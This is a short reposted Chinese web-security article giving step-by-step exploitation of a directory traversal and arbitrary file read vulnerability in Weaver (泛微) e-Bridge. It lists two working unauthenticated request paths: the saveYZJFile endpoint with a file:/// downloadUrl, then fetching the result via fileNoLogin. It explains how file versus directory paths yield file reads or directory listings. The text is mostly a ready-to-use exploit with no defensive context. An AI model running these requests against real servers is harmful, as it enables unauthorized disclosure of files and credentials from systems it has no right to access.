泛微雲橋目錄遍歷+任意文件讀取最新

本文轉載自查看原文 2020-09-13 21:35 1224 web安全/ 泛微雲橋

利用方式：

第一步：

/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt

第二步：

/file/fileNoLogin/id

注：

downloadUrl參數填寫文件的絕對路徑時，可以造成任意文件讀取；

downloadUrl參數填寫目錄的絕對路徑時，可以造成目錄遍歷。

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 泛微雲橋任意文件讀取泛微雲橋e-Bridge 目錄遍歷，任意文件讀取泛微雲橋任意文件讀取漏洞泛微OA雲橋未授權任意文件讀取目錄瀏覽(目錄遍歷)漏洞和任意文件讀取/下載漏洞任意文件讀取任意文件讀取 Apache Solr最新任意文件讀取漏洞任意文件讀取和上傳 7、任意文件讀取與下載